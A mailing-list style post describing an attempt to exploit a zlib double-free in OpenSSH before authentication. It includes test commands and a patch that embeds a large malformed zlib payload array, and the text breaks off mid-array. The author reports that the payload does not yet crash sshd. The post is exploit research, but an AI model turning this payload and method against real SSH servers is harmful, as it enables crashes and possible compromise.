exploiting the zlib bug in openssh

A bug was found in the zlib compression library which causes inflateEnd() to 
incorrectly free the same chunk of memory twice when given a deformed chunk 
of compressed data. A PNG image was discovered (not by me) which triggers 
this flaw; it is attached.

OpenSSH uses the zlib library to compress data when the -C option is passed 
to it. With version 2 of the protocol, it is possible to send 
compressed/encrypted messages to the remote daemon before having to 
authenticate (just after key exchange). This is done using SSH2_MSG_IGNORE 
packets in the kex2() function of sshconnect2.c.

The attached patch to libpng-1.2.1 causes pngtest to dump out the contents of 
the buffer it passes to inflate(). This is used with the attached PNG file to 
obtain the buffer the OpenSSH client needs to send. The buffer size has been 
tweaked in libpng to match the one used in OpenSSH-3.1p1 (4096 bytes). The 
pngtest program will SEGV after dumping out this buffer from the PNG file.

I patched the OpenSSH client to send this corrupt zlib buffer after the key 
exchange; the inflate() call on the remote end is returning the correct value 
indicating that the buffer did what it was supposed to (Z_MEM_ERROR or -4), but 
the remote daemon is NOT crashing during the fatal_cleanup() and inflateEnd() 
calls. Taking the same buffer and sticking it into the inflate() call of 
another application causes the desired SEGV and possible path to 
exploitability, so why isn't OpenSSH crashing?

The attached patch applies to OpenSSH-3.1p1; if you run the daemon code it 
will spit out the received buffer (to make sure it made it across OK) and 
some other debugging information. The recommended command line to test this:

# ./sshd -d -d -d
# ./ssh -2 -C -v -v -v root@127.0.0.1

If for some reason you can't access the attachments, you can find copies of 
them on my web site at the following URL:

http://www.digitaloffense.net/openssh_zlib/

diff -u -r openssh-3.1p1/compress.c openssh-3.1p1-zlib/compress.c
--- openssh-3.1p1/compress.c	Tue Mar 12 03:33:02 2002
+++ openssh-3.1p1-zlib/compress.c	Tue Mar 12 03:33:03 2002
@@ -24,11 +24,277 @@
 static int compress_init_send_called = 0;
 static int compress_init_recv_called = 0;
 
+
+unsigned char *boomij = 
+"\x78\xda\xed\x99\x5d\x6c\x1c\x57\x15\xc7\x7f\x77\x76\x76\x77\xd6\xf1"
+"\xc6\xde\xc6\x4e\x76\x63\x37\x8e\x93\xd6\xa4\xa1\x7d\x88\x42\x91\xf2"
+"\xd0\x22\x54\x44\x41\xa8\xa0\x56\x54\xad\xe8\x87\xa2\xd2\xa8\xbc\xa0"
+"\xf2\x51\x09\x41\x79\xaa\x68\xa5\x82\xe0\x11\x29\x95\x10\x42\x42\x20"
+"\x8a\x04\x52\x1f\x88\xaa\x3e\x10\x11\xd1\xa0\x14\x54\x62\x27\xb5\xf3"
+"\xb9\x89\xbf\xbf\xe2\xd9\x5d\xdb\x3b\x77\x77\x66\xee\xe5\x61\xef\xec"
+"\x8e\x37\x4e\xb2\x11\x2a\xaa\x44\xae\x75\x35\xb3\xe3\x99\x3b\xe7\x7f"
+"\xce\x0b\x9c\xfb\xbf\x77\xe0\x4e\xbb\xd3\xee\xb4\x3b\xed\x4e\xfb\x7f"
+"\x6e\xe2\x13\x6e\x93\xfe\xa4\x00\x10\xb7\x30\xa8\x13\x3b\xf4\xff\x12"
+"\x80\xe8\xc0\x78\xbd\xc9\x7d\xe2\x06\x86\xeb\x1b\x81\xb0\x3f\x26\xc3"
+"\x45\x07\x0e\xda\xcc\x78\xb1\x09\x85\xf4\xcd\x40\x74\x04\xe0\x77\xdf"
+"\xf9\xa6\x52\x4a\xa3\xb5\x22\x54\x21\xf5\x40\x51\x57\x0a\x85\x40\x08"
+"\x0b\x61\x09\x84\x48\xa0\xcd\x5f\x18\x28\xae\x79\x1e\x4a\xc0\x36\x27"
+"\x43\x22\x99\x22\x61\xdb\x24\xec\x04\x09\xcb\x42\xfb\x75\xfc\x5a\x0d"
+"\xdf\xf7\x09\x94\x42\x69\x4d\x18\x2a\xfc\x20\xa4\x2a\x3d\xdc\xaa\x44"
+"\xa9\x90\x1e\x3b\x01\xc0\xcf\x8f\x1d\x77\x00\x65\xfa\x06\x10\x1d\x01"
+"\x08\x42\x05\x1a\x42\xad\x09\x02\x45\x18\x2a\xf6\x7f\xe3\x88\xc8\x65"
+"\x73\x38\xdd\x4e\xa3\xdb\x0e\x32\x90\x48\x29\x41\x36\x9e\xfb\xc1\xcb"
+"\x2f\xe9\x4f\xef\xe8\xe3\xf9\xd7\x5e\x15\x8e\xe3\x98\xc1\x5a\xe3\x4a"
+"\x29\x5b\x3f\x4a\x25\xe8\xed\x05\xe0\x95\x23\x2f\x68\xb4\xcf\xca\x6c"
+"\xb0\x33\x34\xe7\x2a\x0e\xc0\xea\x08\x80\xd2\xf8\x61\x48\x18\x86\x28"
+"\xad\xc4\xd0\x13\xcf\x89\x7c\x3e\xcf\xea\xea\x2a\xa1\x08\x63\x37\x36"
+"\xba\x0c\x24\x32\x90\xe4\xef\xd9\x27\x5c\x4f\x36\x8d\x2e\x9d\x38\x79"
+"\x7d\xec\x03\xe0\x42\x91\xb9\xb7\xdf\xc6\x31\x80\xbe\xfa\xdc\x61\xe1"
+"\x85\x8a\xd5\xd4\x16\x91\xca\x6d\xe3\x73\x87\x0e\x75\x99\x27\xac\x58"
+"\xbf\x0d\x00\x61\x48\xa0\x42\x7c\x15\x72\xf7\xd7\x9f\xa3\x50\x28\x90"
+"\x4a\xa5\x28\x5e\x29\x52\xaf\xd4\x91\x52\xb6\xbc\x1f\xb4\x80\x00\xd4"
+"\x03\xd5\xf2\xfa\x9a\x44\x96\x4a\x94\x4e\x9e\x44\xce\x97\x1a\x5e\x07"
+"\xe4\xdd\x05\x88\xa2\x61\xee\xfd\xf2\x63\x5f\x13\x03\xdb\xfb\xf5\x6b"
+"\x47\x7f\x2d\x56\x56\x57\x1f\x36\x00\x6c\x20\x11\xb7\xed\xb6\x00\x7c"
+"\xea\xe9\x23\x62\x68\xc7\x10\xb6\x6d\x13\x86\x21\x6e\xc5\x65\x7e\x79"
+"\xbe\x65\xa0\x39\x46\x11\x68\x66\xaa\x03\xf2\x83\x0f\xa1\xdb\x41\x5e"
+"\x18\x47\xce\xcf\x23\x8b\xe3\x94\xc6\xc6\x37\xd0\x29\x72\x04\xc0\x70"
+"\x10\xf0\xf8\x17\xbe\x24\x5e\x3c\x7c\x98\xfe\xee\xee\x87\x8c\xf1\x5d"
+"\xc0\x16\x20\x1d\xd9\xde\x51\x0e\xf8\x4a\xa1\x94\x22\x93\xcc\x70\x79"
+"\xf2\x32\x95\x95\x0a\xee\xaa\x4b\xad\x56\xa3\x5e\xad\x6f\xf0\xb8\x0c"
+"\x24\x8e\xed\xc4\xca\x88\x86\x00\x9c\x07\x0f\xe0\x04\x0d\x43\x9d\x07"
+"\x1a\xf7\x3b\x51\x1e\xd8\x90\x7b\xfc\x49\xa4\xd3\xc8\xa5\x6e\xcf\x63"
+"\x8b\xeb\x32\x7d\xfc\x38\x9f\xd9\xda\xad\x7f\xf4\xce\x3b\xbf\x00\x72"
+"\x06\x80\x06\x96\x81\x6b\x80\xdf\x09\x00\xe1\x87\x0d\x00\x4c\x15\xd9"
+"\x02\x64\xb4\x47\x8f\xed\xe0\x75\x69\xb2\xeb\xeb\xc8\x0b\xe3\xe0\x38"
+"\xc6\x83\x40\x20\xf1\x22\x00\x5a\x21\xa7\x8a\x26\x37\xda\x12\x97\xd6"
+"\xbd\x19\x40\x5e\x90\x78\xbe\x4f\xff\xec\x2c\x6b\xd5\x2a\xcb\xf3\xf3"
+"\x9c\x29\x2d\x01\x6c\x05\x0a\xc0\x5d\x80\x6f\x02\x5b\xb9\x15\x80\x66"
+"\x4d\xf6\x83\x10\xa5\x43\x7a\x1f\x38\x40\x6f\xe4\xdc\xb8\x1d\x0e\x0d"
+"\xaf\x4b\x89\x3b\x37\xc7\xc4\x99\x09\x76\xef\xdb\xdd\x28\x19\x1a\x64"
+"\x36\xc7\x87\xe3\xe3\x1c\x78\xe0\x00\xbd\x06\x68\x14\x2d\x80\x9c\xa9"
+"\x60\x00\xb5\xbf\xbf\x4f\xe8\xfb\xac\x95\xcb\x8c\x97\x5d\xed\x35\xea"
+"\x4d\x01\xd8\x03\x64\x81\x55\x60\xce\x50\x48\x77\x14\x81\x40\x85\x84"
+"\xaa\x31\x92\x63\x3b\x0d\xe2\x39\xa6\xe2\x44\x1e\x35\x23\x4d\x9c\x99"
+"\x40\x2e\x7d\x40\xee\xfe\x3c\x47\x8f\x1e\xe5\x1f\xef\xfd\x59\xfc\xf5"
+"\xed\xb7\x38\x75\xea\x4f\x04\xcf\xfc\x8c\x07\x0f\x3d\xd8\xa0\x91\xd3"
+"\xa2\x99\x0c\x24\x9e\xe7\x61\xcf\xcf\xa3\x2a\x65\x56\xaf\x5d\x63\x71"
+"\x75\x95\x29\x15\x50\xf7\x03\x80\x01\x43\x21\x80\x2a\x50\x06\xea\x37"
+"\xcb\x81\xf8\xac\x68\xd5\xc3\x10\xa5\x8c\xd1\xb1\x92\x19\x79\x2d\x5e"
+"\xd3\x77\xef\xdb\xcd\x84\x94\x14\xa7\x25\xaf\x3f\xf6\x18\xd9\x7a\x55"
+"\x3f\xfb\xf2\xf7\xc5\x62\xa2\x07\xcf\xf3\x28\x5f\x2b\x93\x4e\xa7\x5b"
+"\xcf\x46\x05\xa0\x56\x23\xbc\x70\x01\xcf\x75\x71\x5d\x97\x4a\xa1\x80"
+"\x5c\x9e\x17\xeb\x9e\xd4\xc0\x4e\xc3\xb2\x65\xe3\x7d\x37\x7a\xd2\xea"
+"\x40\x1a\x08\x3f\x50\x04\x4a\x35\x93\x33\xaa\x18\xf1\xe4\x8d\xae\x17"
+"\x72\x05\xf6\xed\xdb\x87\x94\x92\x9d\x3b\x77\xa2\xb4\x46\x59\x8a\xed"
+"\x77\x6d\xe7\x72\xf1\x32\xd3\xd3\xd3\x1b\x9c\xe0\xf9\x1e\x9e\xef\x11"
+"\x8e\x8d\x22\x2c\x8b\xf2\xc2\x02\x15\xcb\x42\x6e\xdb\xc6\xba\xac\xeb"
+"\xf5\x5a\x1d\xa0\xcf\x4c\x64\xae\x01\xe1\x45\xf4\xb6\x3b\xd1\x35\x81"
+"\xd6\x02\xad\x5b\xbc\x95\x6d\x62\x24\x56\x46\xa5\x94\xe4\x72\xb9\x66"
+"\x44\x02\x15\x8a\x33\xff\x3c\xc3\xb9\xe2\x39\x76\xee\xd8\x89\x6d\xdb"
+"\xb8\xae\xbb\x21\x99\x53\xcb\x8b\x74\xcb\x1a\xa5\xa9\x29\x4a\xe5\x32"
+"\x0b\x85\x02\x0b\x73\x73\xac\x4b\x49\xad\xee\x0b\x33\xfb\x96\x81\x05"
+"\x93\x03\xb7\x94\x12\x22\x36\x4f\x58\x4a\x6b\xad\x1b\x39\x20\xe2\xd4"
+"\x71\x6c\xa7\x65\xbc\xdd\xba\xee\xf9\x1e\xbd\x7d\x0d\x59\x60\x09\xa1"
+"\x0b\x85\x82\xe8\xeb\xef\x63\xff\x7d\xfb\x11\x49\x81\x08\x05\x9e\xef"
+"\x91\xc9\x64\xf0\x16\x16\x48\xcb\x2a\x9e\x94\xb8\x8b\x8b\x5c\x11\x82"
+"\xf3\x2b\x2b\x8d\x12\xed\xfb\x08\x21\x34\x50\x02\x66\x81\xc5\x88\xfb"
+"\x9d\x68\xa1\x66\x1e\x84\xa1\x6a\xd4\x73\x33\x17\x36\x75\x8f\xa9\xf9"
+"\x32\x68\xd0\xc9\xb1\x1d\x5c\xcf\x6d\xfe\x06\x48\x58\x16\xf7\xde\x7b"
+"\x2f\xe9\x2d\x69\x12\x89\x44\x23\x4a\xa1\x24\x93\xcc\xb0\x52\x59\xc1"
+"\x99\x98\x20\xd5\xdb\xcb\x54\xb1\x88\x5b\xa9\x30\x8e\x60\xd5\xf3\x48"
+"\x26\x93\xd8\x09\x8b\x64\xd2\x06\x98\x32\xdc\x97\x31\x19\x2e\x3a\xcd"
+"\x01\x2b\x54\x9a\x50\xe9\xd6\x04\xe5\x5c\x2f\xc8\xa2\xff\x95\x96\x4b"
+"\x4c\xfc\x7b\x82\xd2\x72\x29\x8a\x00\xe5\xf5\x32\xa3\xa3\xa3\x78\x9e"
+"\xd7\x00\x67\x37\xa2\xd4\x3d\xb5\x40\x2e\x9f\x67\xf1\xec\x59\xdc\x95"
+"\x15\x4e\x7b\x92\x52\xbd\x8e\x6d\xdb\xf4\xf4\xf4\xd0\xdd\x95\x21\x9b"
+"\xc9\x60\x3c\xef\xb5\x1b\x7f\x2b\x00\xcd\x9b\x42\xad\xd0\x4a\x37\x3c"
+"\xee\x38\x2d\xd1\x16\x4d\xfd\x31\x01\x77\xe5\xca\x15\xe4\xd2\x07\xec"
+"\xe8\xd1\xbc\xf9\xe6\x9b\x3c\xfb\xd2\x8b\xe2\xc4\xb1\x3f\xf2\xce\xaf"
+"\xbe\xcb\xe9\xd3\xa7\x49\xa7\xd3\x0d\xde\x4b\x49\x4f\x3a\xc9\xca\xa5"
+"\x4b\x2c\x4d\x4e\x32\x5b\xa9\x70\x51\x58\x64\xb7\x66\x19\x18\x18\xa0"
+"\x50\x28\xb0\xc5\xc9\x88\x74\x32\x85\x31\x3e\xb2\x37\xbe\xd6\x10\x76"
+"\x67\xab\x29\x8d\x16\xe2\x3a\xc5\x19\xe7\x3f\x80\xe7\x79\xe4\xf3\x79"
+"\x46\x2b\x43\xfc\xeb\xdc\x0c\x3f\xf9\xed\x0b\x6c\xf7\xd6\xf5\x53\xcf"
+"\x7f\x4b\xf4\x6c\x09\xf0\x3d\x9f\xc9\xcb\x93\xa4\x52\x29\xb6\x16\x2f"
+"\xa2\xb6\x66\x59\x98\x98\xe0\x5a\xa9\xc4\x29\xdf\xc7\x4a\x67\xc8\xf5"
+"\xe4\x18\x1c\x1c\x44\x08\x81\x65\x59\x5a\x58\x62\x03\x1b\x62\x47\xeb"
+"\x46\x11\xd0\xed\xe7\x02\x81\x40\x6f\xd0\x38\x04\x34\xa9\x10\x07\xd3"
+"\xdb\xdb\xcb\xde\x81\xbd\xac\xad\xad\xe1\xa4\xd3\x58\x35\x9f\xe5\xe5"
+"\x65\xd6\xec\x21\x4a\xe5\x12\x3a\xad\xc9\xcc\x4f\x93\x1b\x1c\xe0\xea"
+"\xfb\xef\x53\x29\x97\xb9\xb8\xb6\x4e\x29\x91\xa0\xaf\xbf\x8f\x91\x91"
+"\x11\xf2\xf9\x3c\x89\x44\x02\xcb\x42\x88\xcd\x0b\x4b\x73\x49\x6a\xdf"
+"\x62\x11\xad\xa3\x33\xad\x75\x6b\xf2\xb1\xc1\xe9\x6e\x48\x82\x4c\x83"
+"\xa3\x2d\x05\xea\xc0\xb6\x6d\xdb\xa8\xab\x3a\x3d\xe7\xcf\x53\xad\xd7"
+"\xb9\x7a\xf5\x2a\xca\x52\xec\xdc\xbd\x93\x7c\x60\xe1\x9e\x3d\xcb\x74"
+"\x2a\x45\x79\x61\x81\xb9\x95\x15\xce\x02\xd9\xee\x2c\xc3\x43\xc3\x0c"
+"\x0e\x0c\x12\xe8\x00\x21\x04\x5a\xa3\x8d\x09\x89\x98\xd7\x6f\x99\x03"
+"\xed\x8b\x70\xdd\x98\x03\xb4\x68\x1a\x6f\x54\xa3\xe3\x38\xad\xf3\x78"
+"\xef\x76\xd8\x7d\xcf\x6e\xba\xba\xba\x48\x25\x6d\xf6\xdd\xbf\x8f\x83"
+"\x9f\x3d\xc8\xc8\xd0\x10\xf5\x8b\xe7\x79\xf8\xd5\x57\xa9\x7b\x1e\x4b"
+"\xae\xcb\x44\x10\x62\x6d\xe9\x26\xbf\x23\xcf\xc0\xc0\x00\xe9\x54\x1a"
+"\x11\xf9\x5d\x8b\x38\x1f\xac\x58\x12\x5b\x37\xcb\x81\xeb\xa2\xa0\x85"
+"\x46\x6b\xb4\x63\x3b\xa2\xa1\xe3\x24\x4e\xb7\xd3\x28\x6a\x41\xe3\x37"
+"\x40\x2e\x9b\x6b\x46\x29\x93\xcc\x60\xdb\x36\x49\xdb\x66\xef\xd0\x5e"
+"\x72\xb9\x1c\x0b\x27\xfe\x4a\xdf\xf0\x30\xc7\xdf\x78\x83\x5d\x8f\x3c"
+"\xc2\x47\xee\x0a\x33\x57\xae\xd2\xdf\xdb\xcb\x9e\x3d\x7b\xc8\xe5\x72"
+"\x58\x56\xcb\xa7\x09\xd1\xf4\xa7\x68\x03\xa1\x6f\x36\x13\xeb\xf6\x64"
+"\xd6\x5a\xa3\xf4\xc6\x1d\x86\x48\x8c\x49\x29\x37\x48\x0c\x02\x03\xc4"
+"\x94\x57\xad\x35\x99\x4c\x86\xd5\xd9\x19\x7a\xb3\x59\xe6\x47\x47\x99"
+"\x3e\x77\x8e\x33\x63\x63\x1c\xaf\xfb\x64\xb3\x59\x86\x76\x0d\x31\x38"
+"\x30\x48\xba\x2b\x4d\x6d\xbd\xd6\xa2\x82\x40\xc4\xec\x51\x9b\xed\x4e"
+"\x74\x12\x01\xa5\xb5\x16\x81\x52\x7c\xef\x99\x27\xf5\xc8\x43\x8f\xdc"
+"\xee\x5e\x92\xf8\xe9\x8f\x5f\xe1\xe9\x43\x0f\x91\xef\xef\x67\x7a\x74"
+"\x94\x25\xd7\x65\x54\x6b\x96\xc3\x90\xac\x9d\xa0\x5a\xab\x32\x35\x3b"
+"\x85\x35\xbf\x91\xd1\x8d\x49\x58\x08\xa3\x83\xc2\xd8\xae\x04\x9d\x68"
+"\xa1\x26\xfb\x94\x42\xaf\xfb\x8a\x72\xdd\xe7\xc4\xbb\xc7\x74\xdb\x5b"
+"\x88\x6a\x45\x93\xba\x5a\x10\x6a\x85\x63\x27\xb8\xab\xcb\x61\x6b\x2a"
+"\xcd\xae\xe1\x61\x31\x79\xea\x14\x4b\xae\xcb\x54\x75\x5d\x7f\x54\xf5"
+"\xf0\x03\x9f\xb0\xba\xc6\x25\x6f\x9d\xa9\xf1\xb3\x80\x6e\x6c\x1c\x28"
+"\x05\x08\x72\x09\x11\xf1\x20\xf2\x7e\xd8\xb6\xbd\x72\x43\x00\x11\xc7"
+"\x34\xa0\x84\xb8\xc9\x64\x27\x84\xc6\x84\x3a\x16\x6f\x21\x04\x3a\x7a"
+"\xfb\xe7\x47\xee\x63\xa5\x58\x64\xf2\xc2\x05\x26\xab\xeb\x7a\xc2\x49"
+"\x93\xf4\x7d\x12\x09\x21\xd2\xa9\xa4\xb6\x13\x96\x68\x2b\xdf\x02\xb4"
+"\xd6\x2d\xfa\x47\xba\x37\x1e\x09\xdd\x49\x04\x34\xc0\x5b\xef\x1e\xcf"
+"\x02\x3d\xc0\x0e\x60\xd0\x1c\xb7\x9a\xc5\xb5\x0d\x24\x4d\xa9\xb3\x63"
+"\x65\xce\x07\xaa\x5f\xdc\xbf\x7f\xfb\x9e\x27\x46\xbe\xfd\xd1\x7b\xef"
+"\x31\x3e\x37\x77\xf9\x97\x63\x63\xef\x02\xdb\x80\x5e\xf3\x9e\xb2\x11"
+"\x6b\x9e\x31\x2e\x5a\xb0\x5c\x03\x96\xcc\xd2\x31\x30\xe3\xc5\x81\xa8"
+"\x4e\x56\x64\xda\xdc\x18\x00\xeb\x66\xc0\xba\x39\x76\x01\x29\x63\x7c"
+"\x74\x8c\xb6\x3d\x12\x91\x03\x8e\x3c\xfa\xe8\x0b\x33\x63\x63\x4c\xce"
+"\xcc\x94\x8e\x15\x8b\xbf\x31\xe3\x45\x12\x39\x34\x12\x79\xda\x08\xb5"
+"\x30\x02\x6e\x7a\xc5\x00\x93\xe6\x7a\x3d\x06\x44\x75\x12\x81\xf8\x9c"
+"\x10\x95\x87\x3a\xb0\x16\x33\x3c\xea\x51\x24\x22\x20\xd6\x53\x07\x0f"
+"\xde\x57\x9f\x9b\x1b\xbe\x34\x3b\xbb\xf2\xfb\xf1\xf1\x1f\x16\xd7\xd6"
+"\x6a\x66\x79\x18\x9a\x31\x2a\xc0\xa4\x51\x9a\x91\x58\xf3\x63\xdd\x33"
+"\xef\x93\x34\x8b\x76\xcb\xf8\xdb\x89\x40\xd4\x6a\x31\x2f\x45\x86\xc6"
+"\xa3\x60\xc7\x80\x58\x5f\x19\x19\x39\x5c\x29\x97\xf9\xdb\x95\x2b\xaf"
+"\x8f\x97\x4a\x33\xc6\xf8\x2e\x33\xe6\xaa\xd1\xf8\x33\xc0\x8a\x19\x33"
+"\xa2\x86\x1f\xa3\x4d\xdd\xbc\x37\xea\xb7\x4d\x21\xd1\x06\x24\x68\x03"
+"\xa7\x62\x2f\xb3\xe3\x7d\xbd\x52\x99\x1f\x9b\x99\xf9\xc3\x5f\x26\x27"
+"\x4f\x02\xdb\xcd\xba\xd6\x32\x9e\x5d\x04\xae\xc6\x74\xbe\x6a\x4b\xd2"
+"\x76\x10\x71\xfa\xe8\x96\x4e\xeb\x6c\xcb\x7c\xc3\x22\xdf\xf4\x44\x4c"
+"\xa3\xd8\xb1\xf3\x64\x6c\xfb\x2f\xba\xbe\x15\xd8\x65\xb6\x47\x32\x26"
+"\x9f\x26\x4d\x04\xd6\x8c\x31\x41\x5b\xb9\x8c\x7a\x10\x8b\x4e\xd0\x0e"
+"\xa0\x93\x6d\x15\xbd\xc9\xb9\x8e\xbd\xc8\x32\x83\x46\x00\x6a\x6d\xc2"
+"\xab\x2b\x96\xb4\xab\xa6\x00\xcc\x1b\xcf\x57\x8d\x71\xed\x33\x6d\x3c"
+"\xb2\xed\xe7\xfa\xb6\xb7\xd7\xdb\xf4\x87\x8a\xbd\xb0\xfd\xa3\x84\xb5"
+"\x49\xd4\x74\xac\xa2\x94\x4c\x79\x5c\x30\xd7\x54\x5b\x8e\xc5\x9b\xda"
+"\x64\x4b\x5d\xfd\xb7\x5f\x68\x74\x5b\x5e\xb4\x7f\x1a\x0a\x6f\xf0\x95"
+"\xc6\x8d\x51\x61\xc5\x50\x48\xdd\xe4\xd3\xd3\xcd\x8e\x1f\xfb\x37\xb2"
+"\xf6\x31\xad\x58\x79\x0d\x4c\x32\xea\x5b\x7c\xf4\xd3\x7c\xc2\x9a\x68"
+"\x5b\xcf\xde\xea\xc3\x5e\xc7\xed\x3f\x20\xc4\x9e\xae\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
